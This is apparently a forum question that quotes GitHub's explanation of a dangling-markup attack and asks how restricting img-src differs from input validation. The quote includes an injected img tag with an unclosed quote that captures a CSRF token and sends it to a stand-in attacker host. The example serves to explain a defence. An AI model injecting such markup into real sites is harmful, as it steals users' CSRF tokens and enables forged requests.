GitHub explains the problem with img-src
in
"GitHub's post-CSP journey":
A tag with an unclosed quote will capture all output up to the next matching quote. This could include security sensitive content on the pages such as:
<img src='https://some-evil-site.com/log_csrf?html= <form
action="https://github.com/account/public_keys/19023812091023"> ...
<input type="hidden" name="csrf_token" value="some_csrf_token_value">
</form>
The resulting image element will send a request to https://some_evilsite.com/log_csrf?html=...some_csrf_token_value.... As a result, an attacker can leverage this dangling markup attack to exfiltrate CSRF tokens to a site of their choosing.
How does this differ from pressing page-source on the page and sending the content manually? If it is just for pages where users can insert input, don't we have to prevent only those issues with inputs by adding validations to the input? Not prevent img src of other sources in all the code?